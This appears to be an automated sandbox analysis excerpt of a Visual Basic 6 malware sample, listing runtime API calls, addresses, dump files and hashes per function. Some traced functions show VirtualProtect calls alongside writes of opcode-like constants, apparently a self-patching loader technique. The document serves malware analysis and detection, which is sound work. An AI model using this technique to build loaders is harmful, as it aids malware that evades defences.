Part of subcall function 0054EEC1: __vbaVarMove.MSVBVM60(?,00006011,?), ref: 0054F068

__vbaStrVarMove.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 0054D12C
__vbaStrMove.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 0054D136
__vbaStrCopy.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 0054D146
__vbaFreeStr.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 0054D14E
__vbaFreeObj.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 0054D156
__vbaFreeVar.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 0054D15E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054D196
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054D1DD
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054D224
__vbaObjSetAddref.MSVBVM60(?,?), ref: 0054D23F
__vbaStrMove.MSVBVM60(00000000,?,?), ref: 0054D24F
__vbaStrCopy.MSVBVM60(00000000,?,?), ref: 0054D25F
__vbaFreeStr.MSVBVM60(00000000,?,?), ref: 0054D267
__vbaFreeObj.MSVBVM60(00000000,?,?), ref: 0054D26F
__vbaObjSetAddref.MSVBVM60(?,?,00000000,?,?), ref: 0054D27B
__vbaStrMove.MSVBVM60(00000000,?,?,00000000,?,?), ref: 0054D28B
__vbaStrCopy.MSVBVM60(00000000,?,?,00000000,?,?), ref: 0054D29B
__vbaFreeStr.MSVBVM60(00000000,?,?,00000000,?,?), ref: 0054D2A3
__vbaFreeObj.MSVBVM60(00000000,?,?,00000000,?,?), ref: 0054D2AB
__vbaObjSetAddref.MSVBVM60(?,?,00000000,?,?,00000000,?,?), ref: 0054D2B7
__vbaStrMove.MSVBVM60(00000000,?,?,00000000,?,?,00000000,?,?), ref: 0054D2C7
__vbaStrCopy.MSVBVM60(00000000,?,?,00000000,?,?,00000000,?,?), ref: 0054D2D7
__vbaFreeStr.MSVBVM60(00000000,?,?,00000000,?,?,00000000,?,?), ref: 0054D2DF
__vbaFreeObj.MSVBVM60(00000000,?,?,00000000,?,?,00000000,?,?), ref: 0054D2E7
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054D31F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054D366
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054D3AD
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054D3EE
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 0054D418
__vbaAryLock.MSVBVM60(?,?), ref: 0054D427
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054D467
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054D514
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,0FFFFFFF,00000000), ref: 0054D555
__vbaAryLock.MSVBVM60(?,?), ref: 0054D564
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054D5A4
__vbaAryUnlock.MSVBVM60(?), ref: 0054D5BC
__vbaAryUnlock.MSVBVM60(?), ref: 0054D47F

Part of subcall function 0054E01F: __vbaChkstk.MSVBVM60(?,00401526,?,?,?,0054D5F3,?,00004008,000000FF,?), ref: 0054E03A
Part of subcall function 0054E01F: __vbaVarVargNofree.MSVBVM60(?,?,?,?,00401526,?,?,?,0054D5F3,?,00004008,000000FF,?), ref: 0054E052
Part of subcall function 0054E01F: __vbaStrVarCopy.MSVBVM60(00000000,?,?,?,?,00401526,?,?,?,0054D5F3,?,00004008,000000FF,?), ref: 0054E058
Part of subcall function 0054E01F: __vbaStrMove.MSVBVM60(00000000,?,?,?,?,00401526,?,?,?,0054D5F3,?,00004008,000000FF,?), ref: 0054E062
Part of subcall function 0054E01F: __vbaNew2.MSVBVM60(004082A0,00000000,00000000,?,?,?,?,00401526,?,?,?,0054D5F3,?,00004008,000000FF,?), ref: 0054E095
Part of subcall function 0054E01F: __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A838,0000001C,?,?,?,?,00401526,?,?,?,0054D5F3,?,00004008,000000FF), ref: 0054E0D7
Part of subcall function 0054E01F: __vbaStrToAnsi.MSVBVM60(?,00004008,00000018,00000000,?,?,?,?,00401526,?,?,?,0054D5F3,?,00004008,000000FF), ref: 0054E0F0
Part of subcall function 0054E01F: __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,00004008,00000018,00000000,?,?,?,?,00401526,?,?,?,0054D5F3), ref: 0054E104
Part of subcall function 0054E01F: __vbaFreeStrList.MSVBVM60(00000002,00004008,?,?,00000000,00000000,?,00004008,00000018,00000000,?,?,?,?,00401526), ref: 0054E122
Part of subcall function 0054E01F: __vbaNew2.MSVBVM60(004082A0,00000000), ref: 0054E145

__vbaAryUnlock.MSVBVM60(?,0054DCB9,?,00000000,?,?,?,?,?,?,?), ref: 0054DC85
__vbaAryDestruct.MSVBVM60(00000000,?,?,0054DCB9,?,00000000,?,?,?,?,?,?,?), ref: 0054DC90
__vbaFreeObj.MSVBVM60(00000000,?,?,0054DCB9,?,00000000,?,?,?,?,?,?,?), ref: 0054DC98
__vbaFreeObj.MSVBVM60(00000000,?,?,0054DCB9,?,00000000,?,?,?,?,?,?,?), ref: 0054DCA0
__vbaAryDestruct.MSVBVM60(00000000,?,00000000,?,?,0054DCB9,?,00000000,?,?,?,?,?,?,?), ref: 0054DCAB
__vbaFreeObj.MSVBVM60(00000000,?,00000000,?,?,0054DCB9,?,00000000,?,?,?,?,?,?,?), ref: 0054DCB3

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$Free$CheckHresult$Move$Addref$Copy$Unlock$ChkstkLockRedim$DestructNew2$AnsiBoolErrorListNofreeNullSystemVarg
String ID:
API String ID: 734032644-0
Opcode ID: 92e043a3781038a5bfba59b0bd5da739a0a985a6ae3399c4668023924b945dee
Instruction ID: 9456bab0da458fe4002216eaa59ded257b21e4b72fd5d97ff4916e9573decfa9
Opcode Fuzzy Hash: 92e043a3781038a5bfba59b0bd5da739a0a985a6ae3399c4668023924b945dee
Instruction Fuzzy Hash: 4A92C171D00218AFDF10EBA5CC85FEDBBB9BB08308F14846AF115B71A2DB7999548F64

Function 005C75A5 Relevance: 125.0, APIs: 70, Strings: 1, Instructions: 747
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaChkstk.MSVBVM60(00000000,00401526,?,?,?,005C7585), ref: 005C75C2
__vbaNew2.MSVBVM60(0040B6BC,005C9B40,?,0000000A,?,00000000,00401526,?,?,?,005C7585), ref: 005C75E7
__vbaNew2.MSVBVM60(00408968,005C9314), ref: 005C7620
__vbaObjSetAddref.MSVBVM60(00401526,?), ref: 005C7647
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B6AC,00000010), ref: 005C7670
__vbaFreeObj.MSVBVM60(00000000,?,0040B6AC,00000010), ref: 005C7687
__vbaAryLock.MSVBVM60(?,005C9320), ref: 005C76C2
#644.MSVBVM60(?,?,005C9320), ref: 005C76D8
__vbaAryUnlock.MSVBVM60(?,?,?,005C9320), ref: 005C76E4
__vbaObjSet.MSVBVM60(00401526,00000000,?,?,00000000,?,?,?,005C9320), ref: 005C7715
__vbaObjSetAddref.MSVBVM60(005C931C,00000000,00401526,00000000,?,?,00000000,?,?,?,005C9320), ref: 005C7724
__vbaFreeObj.MSVBVM60(005C931C,00000000,00401526,00000000,?,?,00000000,?,?,?,005C9320), ref: 005C772C
__vbaObjSetAddref.MSVBVM60(00401526,00000000,005C931C,00000000,00401526,00000000,?,?,00000000,?,?,?,005C9320), ref: 005C773D
#644.MSVBVM60(00000000,00401526,00000000,005C931C,00000000,00401526,00000000,?,?,00000000,?,?,?,005C9320), ref: 005C7743
__vbaFreeObj.MSVBVM60(00000000,00401526,00000000,005C931C,00000000,00401526,00000000,?,?,00000000,?,?,?,005C9320), ref: 005C7751
__vbaObjSetAddref.MSVBVM60(00401526,00000000,005C9318,005C92E8,00000000,00401526,00000000,005C931C,00000000,00401526,00000000,?,?,00000000,?,?), ref: 005C7790
__vbaFreeObj.MSVBVM60(00000000,00401526,00000000,005C9318,005C92E8,00000000,00401526,00000000,005C931C,00000000,00401526,00000000,?,?,00000000,?), ref: 005C77A5
__vbaAryUnlock.MSVBVM60(?,005C804B,00000000,00401526,00000000,005C931C,00000000,00401526,00000000,?,?,00000000,?,?,?,005C9320), ref: 005C8045

Strings

:U\, xrefs: 005C7D1A, 005C7DA2, 005C7DA5

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$AddrefFree$#644New2Unlock$CheckChkstkHresultLock
String ID: :U\
API String ID: 452095399-1940655514
Opcode ID: 81a153ab3e8a1e9e81adecda5ccee7c54280f2233b8c695c3ba3df23809a098e
Instruction ID: 6536bd0a950bac27b3cd77d99df98d5ec454f35af7d190ff8d9d48df06326c10
Opcode Fuzzy Hash: 81a153ab3e8a1e9e81adecda5ccee7c54280f2233b8c695c3ba3df23809a098e
Instruction Fuzzy Hash: E562E7729002199FDB10EBA9CD86FDDBBB8BF08308F54456AE145FB2A2DB349944CF15

Function 0054F0C9 Relevance: 105.4, APIs: 59, Strings: 1, Instructions: 441
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaChkstk.MSVBVM60(00000000,00401526,?,?,?,0054C3FF,?,?,?), ref: 0054F0E4
__vbaRedim.MSVBVM60(00000080,00000004,?,00000003,00000001,0000000F,00000000,?,00000003,?,00000000,00401526,?,?,?,0054C3FF), ref: 0054F109
__vbaNew.MSVBVM60(0040A7CC,0040A7DC), ref: 0054F11B
__vbaObjSet.MSVBVM60(?,00000000,0040A7CC,0040A7DC), ref: 0054F125
__vbaCastObj.MSVBVM60(00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F12B
__vbaObjSet.MSVBVM60(0040A7CC,00000000,00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F135
__vbaFreeObj.MSVBVM60(0040A7CC,00000000,00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F13D
__vbaObjSetAddref.MSVBVM60(00000000,0040A7CC,0040A7CC,00000000,00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F149
#644.MSVBVM60(00000000,00000000,0040A7CC,0040A7CC,00000000,00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F14F
__vbaFreeObj.MSVBVM60(00000000,00000000,0040A7CC,0040A7CC,00000000,00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F15A
#644.MSVBVM60(0040A7DC,00000000,00000000,0040A7CC,0040A7CC,00000000,00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F163
#644.MSVBVM60(?,0040A7DC,00000000,00000000,0040A7CC,0040A7CC,00000000,00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F16F
#644.MSVBVM60(0040A7DC,?,0040A7DC,00000000,00000000,0040A7CC,0040A7CC,00000000,00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F17B
#644.MSVBVM60(0040A7DC,0040A7DC,?,0040A7DC,00000000,00000000,0040A7CC,0040A7CC,00000000,00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F187
__vbaAryLock.MSVBVM60(?,?,?), ref: 0054F1CB
#644.MSVBVM60(?,?,?,?), ref: 0054F1E3
__vbaAryUnlock.MSVBVM60(?,?,?,?,?), ref: 0054F1EF
__vbaObjSetAddref.MSVBVM60(00000000,0040A7CC,?), ref: 0054F20F
#644.MSVBVM60(00000000,00000000,0040A7CC,?), ref: 0054F215
__vbaFreeObj.MSVBVM60(00000000,00000000,0040A7CC,?), ref: 0054F220
#644.MSVBVM60(?,00000000,00000000,0040A7CC,?), ref: 0054F229
__vbaAryLock.MSVBVM60(?,?,0040A7DC,00000000,?,00000000,00000000,0040A7CC,?), ref: 0054F23E
#644.MSVBVM60(?,?,?,0040A7DC,00000000,?,00000000,00000000,0040A7CC,?), ref: 0054F255
__vbaAryUnlock.MSVBVM60(?,?,?,?,0040A7DC,00000000,?,00000000,00000000,0040A7CC,?), ref: 0054F261
#644.MSVBVM60(0040A7DC,?,?,?,?,0040A7DC,00000000,?,00000000,00000000,0040A7CC,?), ref: 0054F270
#644.MSVBVM60(005C92B0,0040A7DC,0040A7DC,0040A7DC,?,?,?,?,0040A7DC,00000000,?,00000000,00000000,0040A7CC,?), ref: 0054F2A9
#644.MSVBVM60(00000040,-0000000C,00000000,005C92B0,0040A7DC,0040A7DC,0040A7DC,?,?,?,?,0040A7DC,00000000,?,00000000,00000000), ref: 0054F2CC
__vbaAryLock.MSVBVM60(?,0040A7DC,-0000000C,00000040,-0000000C,00000000,005C92B0,0040A7DC,0040A7DC,0040A7DC,?,?,?,?,0040A7DC,00000000), ref: 0054F2F7
__vbaStrCat.MSVBVM60(0040A804,0040A7FC,?,00000000,?,0040A7DC,-0000000C,00000040,-0000000C,00000000,005C92B0,0040A7DC,0040A7DC,0040A7DC,?,?), ref: 0054F31C
__vbaStrMove.MSVBVM60(0040A804,0040A7FC,?,00000000,?,0040A7DC,-0000000C,00000040,-0000000C,00000000,005C92B0,0040A7DC,0040A7DC,0040A7DC,?,?), ref: 0054F326
__vbaI4Str.MSVBVM60(00000000,0040A804,0040A7FC,?,00000000,?,0040A7DC,-0000000C,00000040,-0000000C,00000000,005C92B0,0040A7DC,0040A7DC,0040A7DC,?), ref: 0054F32C
VirtualProtect.KERNELBASE(0040A7CC,00000000,00000000,0040A804,0040A7FC,?,00000000,?,0040A7DC,-0000000C,00000040,-0000000C,00000000,005C92B0,0040A7DC,0040A7DC), ref: 0054F33A
__vbaHresultCheckObj.MSVBVM60(00000000,0040A7CC,0040A7DC,0000002C), ref: 0054F355
__vbaAryUnlock.MSVBVM60(?), ref: 0054F367
__vbaFreeStr.MSVBVM60(?), ref: 0054F36F
#644.MSVBVM60(005C92B0,?), ref: 0054F37D
__vbaStrCat.MSVBVM60(0040AF80,0040AF78,005C92B0,?), ref: 0054F38F
__vbaStrMove.MSVBVM60(0040AF80,0040AF78,005C92B0,?), ref: 0054F399
__vbaStrCat.MSVBVM60(0040B194,00000000,0040AF80,0040AF78,005C92B0,?), ref: 0054F3A4
#638.MSVBVM60(00000008,0040B194,00000000,0040AF80,0040AF78,005C92B0,?), ref: 0054F3C1
__vbaFreeStr.MSVBVM60(00000000,00000000,00000008,0040B194,00000000,0040AF80,0040AF78,005C92B0,?), ref: 0054F3D4
__vbaFreeVar.MSVBVM60(00000000,00000000,00000008,0040B194,00000000,0040AF80,0040AF78,005C92B0,?), ref: 0054F3DC
__vbaAryLock.MSVBVM60(?,00000000,00000000,00000000,00000008,0040B194,00000000,0040AF80,0040AF78,005C92B0,?), ref: 0054F41C
#644.MSVBVM60(?,?,00000000,00000000,00000000,00000008,0040B194,00000000,0040AF80,0040AF78,005C92B0,?), ref: 0054F434
__vbaAryUnlock.MSVBVM60(?,?,?,00000000,00000000,00000000,00000008,0040B194,00000000,0040AF80,0040AF78,005C92B0,?), ref: 0054F440
#644.MSVBVM60(0C2474FF,00000000,00000000,00000000,00000008,0040B194,00000000,0040AF80,0040AF78,005C92B0,?), ref: 0054F465
#644.MSVBVM60(0C2454FF,0040A7DC,0040A7D8,0C2474FF,00000000,00000000,00000000,00000008,0040B194,00000000,0040AF80,0040AF78,005C92B0,?), ref: 0054F487
#644.MSVBVM60(10244C8B,0040A7DC,0040A7D4,0C2454FF,0040A7DC,0040A7D8,0C2474FF,00000000,00000000,00000000,00000008,0040B194,00000000,0040AF80,0040AF78,005C92B0), ref: 0054F4A9
#644.MSVBVM60(2CC20189,0040A7DC,0040A7D0,10244C8B,0040A7DC,0040A7D4,0C2454FF,0040A7DC,0040A7D8,0C2474FF,00000000,00000000,00000000,00000008,0040B194,00000000), ref: 0054F4CB
#644.MSVBVM60(00000000,0040A7DC,0040A7CC,2CC20189,0040A7DC,0040A7D0,10244C8B,0040A7DC,0040A7D4,0C2454FF,0040A7DC,0040A7D8,0C2474FF,00000000,00000000,00000000), ref: 0054F4EA
#644.MSVBVM60(?,0040A7DC,0040A7C8,00000000,0040A7DC,0040A7CC,2CC20189,0040A7DC,0040A7D0,10244C8B,0040A7DC,0040A7D4,0C2454FF,0040A7DC,0040A7D8,0C2474FF), ref: 0054F51C
#644.MSVBVM60(00000000,?,0040A7DC,0040A7C8,00000000,0040A7DC,0040A7CC,2CC20189,0040A7DC,0040A7D0,10244C8B,0040A7DC,0040A7D4,0C2454FF,0040A7DC,0040A7D8), ref: 0054F528
__vbaHresultCheckObj.MSVBVM60(00000000,0040A7CC,0040A7DC,00000020), ref: 0054F574
__vbaAryLock.MSVBVM60(?,00000000), ref: 0054F5BD
#644.MSVBVM60(?,?,00000000), ref: 0054F5D5
__vbaAryUnlock.MSVBVM60(?,?,?,00000000), ref: 0054F5E1
#644.MSVBVM60(?,00000000), ref: 0054F5FF
__vbaAryDestruct.MSVBVM60(00000000,?,0054F64F,00000000,0040A7DC,?,00000000), ref: 0054F641
__vbaFreeObj.MSVBVM60(00000000,?,0054F64F,00000000,0040A7DC,?,00000000), ref: 0054F649

Strings

@, xrefs: 0054F2C1

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$#644$Free$LockUnlock$AddrefCheckHresultMove$#638CastChkstkDestructProtectRedimVirtual
String ID: @
API String ID: 265859740-2766056989
Opcode ID: 613ece9b535810ecb5d2f7c4d494797322ac7e214d0ca1e21d198dd3e06f1673
Instruction ID: b691d540f608e16e27dbed9fe34bd43a82f861531633eec728595e4f847c50fa
Opcode Fuzzy Hash: 613ece9b535810ecb5d2f7c4d494797322ac7e214d0ca1e21d198dd3e06f1673
Instruction Fuzzy Hash: 8002A775D00109AFDF00EFE5CD95EDEBBB9BF08308F14442AE501B7261DB7999158B64

Function 0054F786 Relevance: 100.2, APIs: 56, Strings: 1, Instructions: 453
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaChkstk.MSVBVM60(00000000,00401526,?,?,?,0054C2B9,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054F7A1
__vbaRedim.MSVBVM60(00000080,00000004,?,00000003,00000001,0000000F,00000000,?,?,?,00000000,00401526,?,?,?,0054C2B9), ref: 0054F7C6
__vbaNew.MSVBVM60(0040A7CC,0040A7DC), ref: 0054F7D8
__vbaObjSet.MSVBVM60(?,00000000,0040A7CC,0040A7DC), ref: 0054F7E2
__vbaCastObj.MSVBVM60(00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F7E8
__vbaObjSet.MSVBVM60(?,00000000,00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F7F2
__vbaObjSetAddref.MSVBVM60(005C92AC,00000000,?,00000000,00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F801
__vbaFreeObjList.MSVBVM60(00000002,?,00000000,005C92AC,00000000,?,00000000,00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F810
__vbaObjSetAddref.MSVBVM60(?,00000000,00000000,0040A7CC,0040A7DC), ref: 0054F824
#644.MSVBVM60(00000000,?,00000000,00000000,0040A7CC,0040A7DC), ref: 0054F82A
__vbaFreeObj.MSVBVM60(00000000,?,00000000,00000000,0040A7CC,0040A7DC), ref: 0054F835
__vbaAryLock.MSVBVM60(?,?), ref: 0054F87B
#644.MSVBVM60(?,?,?), ref: 0054F893
__vbaAryUnlock.MSVBVM60(?,?,?,?), ref: 0054F89F
__vbaObjSetAddref.MSVBVM60(00000000,00000000), ref: 0054F8C4
#644.MSVBVM60(00000000,00000000,00000000), ref: 0054F8CA
__vbaFreeObj.MSVBVM60(00000000,00000000,00000000), ref: 0054F8D5
#644.MSVBVM60(0040A7CC,00000000,00000000,00000000), ref: 0054F8DE
__vbaAryLock.MSVBVM60(?,?,00000000,00000000,0040A7CC,00000000,00000000,00000000), ref: 0054F8F3
#644.MSVBVM60(?,?,?,00000000,00000000,0040A7CC,00000000,00000000,00000000), ref: 0054F90A
__vbaAryUnlock.MSVBVM60(?,?,?,?,00000000,00000000,0040A7CC,00000000,00000000,00000000), ref: 0054F916
#644.MSVBVM60(?,?,?,?,?,00000000,00000000,0040A7CC,00000000,00000000,00000000), ref: 0054F925
__vbaRedim.MSVBVM60(00000080,00000004,0040A7DC,00000003,00000001,00000010,00000000,?,00000000,?,?,?,?,?,00000000,00000000), ref: 0054F963
#644.MSVBVM60(?,?,?,00000000,00000000,00000000,?,00000000,00000000,0040A7CC,0040A7DC), ref: 0054F96F
#644.MSVBVM60(00000040), ref: 0054F990
__vbaAryLock.MSVBVM60(?,0040A7DC,?,0040A7D0,00000040), ref: 0054F9B6
__vbaStrCat.MSVBVM60(0040A804,0040A7FC,?,00000000,?,0040A7DC,?,0040A7D0,00000040), ref: 0054F9DB
__vbaStrMove.MSVBVM60(0040A804,0040A7FC,?,00000000,?,0040A7DC,?,0040A7D0,00000040), ref: 0054F9E5
__vbaI4Str.MSVBVM60(00000000,0040A804,0040A7FC,?,00000000,?,0040A7DC,?,0040A7D0,00000040), ref: 0054F9EB
VirtualProtect.KERNELBASE(00000000,00000000,00000000,0040A804,0040A7FC,?,00000000,?,0040A7DC,?,0040A7D0,00000040), ref: 0054FA05
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040A7DC,0000002C), ref: 0054FA25
__vbaAryUnlock.MSVBVM60(?), ref: 0054FA37
__vbaFreeStr.MSVBVM60(?), ref: 0054FA3F
#644.MSVBVM60(?,?), ref: 0054FA48
__vbaStrCat.MSVBVM60(0040AF80,0040AF78,?,?), ref: 0054FA5A
__vbaStrMove.MSVBVM60(0040AF80,0040AF78,?,?), ref: 0054FA64
__vbaStrCat.MSVBVM60(0040B194,00000000,0040AF80,0040AF78,?,?), ref: 0054FA6F
#638.MSVBVM60(00000008,0040B194,00000000,0040AF80,0040AF78,?,?), ref: 0054FA89
__vbaFreeStr.MSVBVM60(00000000,0040A7DC,00000008,0040B194,00000000,0040AF80,0040AF78,?,?), ref: 0054FA9C
__vbaFreeVar.MSVBVM60(00000000,0040A7DC,00000008,0040B194,00000000,0040AF80,0040AF78,?,?), ref: 0054FAA4
__vbaAryLock.MSVBVM60(?,0040A7DC,0040A7DC,00000000,0040A7DC,00000008,0040B194,00000000,0040AF80,0040AF78,?,?), ref: 0054FADF
#644.MSVBVM60(?,?,0040A7DC,0040A7DC,00000000,0040A7DC,00000008,0040B194,00000000,0040AF80,0040AF78,?,?), ref: 0054FAF7
__vbaAryUnlock.MSVBVM60(?,?,?,0040A7DC,0040A7DC,00000000,0040A7DC,00000008,0040B194,00000000,0040AF80,0040AF78,?,?), ref: 0054FB03
#644.MSVBVM60(0424448B,0040A7DC,00000000,0040A7DC,00000008,0040B194,00000000,0040AF80,0040AF78,?,?), ref: 0054FB28
#644.MSVBVM60(408B008B,-00000004,?,00000004,0424448B,0040A7DC,00000000,0040A7DC,00000008,0040B194,00000000,0040AF80,0040AF78,?,?), ref: 0054FB4C
#644.MSVBVM60(20C4832C,-00000008,?,00000004,408B008B,-00000004,?,00000004,0424448B,0040A7DC,00000000,0040A7DC,00000008,0040B194,00000000,0040AF80), ref: 0054FB70
#644.MSVBVM60(E02474FF,-0000000C,?,00000004,20C4832C,-00000008,?,00000004,408B008B,-00000004,?,00000004,0424448B,0040A7DC,00000000,0040A7DC), ref: 0054FB94
#644.MSVBVM60(0000E0FF,-00000010,?,00000004,E02474FF,-0000000C,?,00000004,20C4832C,-00000008,?,00000004,408B008B,-00000004,?,00000004), ref: 0054FBB8
VirtualProtect.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,-00000014,?,00000004,0000E0FF,-00000010), ref: 0054FC1B
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040A7DC,00000020), ref: 0054FC3B
__vbaAryLock.MSVBVM60(?,0040A7DC,0040A7DC), ref: 0054FC85
#644.MSVBVM60(?,?,0040A7DC,0040A7DC), ref: 0054FC9D
__vbaAryUnlock.MSVBVM60(?,?,?,0040A7DC,0040A7DC), ref: 0054FCA9
#644.MSVBVM60(0040A7CC,0040A7DC), ref: 0054FCC7
__vbaAryDestruct.MSVBVM60(00000000,?,0054FD24,0000E0FF,00000000,0040A7CC,0040A7DC), ref: 0054FD13
__vbaAryDestruct.MSVBVM60(00000000,0040A7DC,00000000,?,0054FD24,0000E0FF,00000000,0040A7CC,0040A7DC), ref: 0054FD1E

Strings

@, xrefs: 0054F985

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$#644$Free$LockUnlock$Addref$CheckDestructHresultMoveProtectRedimVirtual$#638CastChkstkList
String ID: @
API String ID: 1659925571-2766056989
Opcode ID: 0302eee18d80d4fdf7390a8f0bd3a0254f92e5ed1ff3cfe3e5726232edf4c478
Instruction ID: 0a2f4aec0a52663139c64dd3e890d317dd5eae52165ebca090b61dab330a896e
Opcode Fuzzy Hash: 0302eee18d80d4fdf7390a8f0bd3a0254f92e5ed1ff3cfe3e5726232edf4c478
Instruction Fuzzy Hash: E302B8B5D00209AFDF00EFE5C985EEEBBB9FB08308F14442AF501BB2A1D77999558B54

Function 0054E01F Relevance: 66.9, APIs: 37, Strings: 1, Instructions: 361
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaChkstk.MSVBVM60(?,00401526,?,?,?,0054D5F3,?,00004008,000000FF,?), ref: 0054E03A
__vbaVarVargNofree.MSVBVM60(?,?,?,?,00401526,?,?,?,0054D5F3,?,00004008,000000FF,?), ref: 0054E052
__vbaStrVarCopy.MSVBVM60(00000000,?,?,?,?,00401526,?,?,?,0054D5F3,?,00004008,000000FF,?), ref: 0054E058
__vbaStrMove.MSVBVM60(00000000,?,?,?,?,00401526,?,?,?,0054D5F3,?,00004008,000000FF,?), ref: 0054E062
__vbaNew2.MSVBVM60(004082A0,00000000,00000000,?,?,?,?,00401526,?,?,?,0054D5F3,?,00004008,000000FF,?), ref: 0054E095
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A838,0000001C,?,?,?,?,00401526,?,?,?,0054D5F3,?,00004008,000000FF), ref: 0054E0D7
__vbaStrToAnsi.MSVBVM60(?,00004008,00000018,00000000,?,?,?,?,00401526,?,?,?,0054D5F3,?,00004008,000000FF), ref: 0054E0F0
